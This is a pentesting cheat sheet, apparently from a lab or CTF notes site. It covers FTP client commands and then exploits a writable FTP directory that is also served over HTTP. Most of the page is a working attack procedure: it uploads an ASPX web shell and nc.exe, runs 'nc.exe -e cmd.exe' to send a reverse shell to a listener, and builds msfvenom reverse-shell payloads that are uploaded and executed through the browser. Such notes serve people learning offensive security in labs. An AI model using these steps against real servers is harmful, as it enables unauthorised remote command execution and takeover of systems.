FTP

Basics

ftp 10.x.x.x    ..connect
help            ..help
pwd             ..print working directory
dir             ..list directory (also: ls)
cd c:\data      ..change directory
lcd /tmp        ..local change directory
get flag.txt    ..download
put test.txt    ..upload
binary          ..Used for graphics, compressed files, audio
put Potato.exe  ..Can now upload EXE

FtpHttp Vulnerability

  • If your FTP is also a HTTP directory

  • You can upload and execute from http

  • REF: develHTB, ReverseShells

-----------------
-----------------
Webshell
locate *aspx
cp /usr/share/webshells/aspx/cmdasp.aspx .
FTP 10.x.x.x
put cmdasp.aspx
firefox http://10.x.x.x/cmdasp.aspx

-----------------
-----------------
Reverse
locate nc.exe
cp nc.exe .
FTP 10.x.x.x
put nc.exe
sudo smbserver.py share .     ..or use smbshare
nc -nvlp 4444                 ..nc listener
http://10.x.x.x/cmdasp.aspx   ..execute our nc reverse shell
cmd = \\10.x.x.x\share\nc.exe -e cmd.exe 10.x.x.x 4444

-----------------
-----------------
Payloads
msfvenom --list payloads | grep windows
msfvenom -p windows/shell_reverse_tcp lhost=$IP lport=4444 -f aspx -o shell.aspx
msfvenom -p windows/shell_reverse_tcp lhost=$IP lport=4444 -f exe -o shell.exe
ftp $IP
put shell.aspx
put shell.exe
nc -nvlp 4444
firefox http://$IP/shell.aspx
dir C:\inetpub\wwwroot
C:\inetpub\wwwroot\shell.exe

REF

PreviousEternal BlueNextheartbleed

Last updated